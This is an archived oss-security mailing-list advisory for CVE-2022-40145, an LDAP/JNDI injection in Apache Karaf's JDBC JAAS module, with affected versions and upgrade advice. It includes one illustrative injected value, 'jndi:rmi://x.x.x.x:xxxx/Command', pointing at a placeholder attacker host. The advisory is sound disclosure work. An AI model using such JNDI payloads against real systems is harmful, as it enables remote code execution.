[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CVE-2022-40145: Apache Karaf: JDBC JAAS LDAP injection
From: Jean-Baptiste_Onofré <jbonofre () apache ! org>
Date: 2022-12-21 15:53:26
Message-ID: 1e60267c-edf3-05bc-4e36-78ebe5889664 () apache ! org
[Download RAW message or body]
Severity: low
Description:
This vulnerable is about a potential code injection when an attacker has control of the target \
LDAP server using in the JDBC JNDI URL.
The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` \
to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in \
JdbcLoginModuleTest#setup.
This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 \
and 4.3.7.
We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
This issue is being tracked as KARAF-7568
Credit:
Xun Bai <bbbbear68@gmail.com> (reporter)
References:
https://karaf.apache.org/security/cve-2022-40145.txt
https://karaf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2022-40145
https://issues.apache.org/jira/browse/KARAF-7568
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic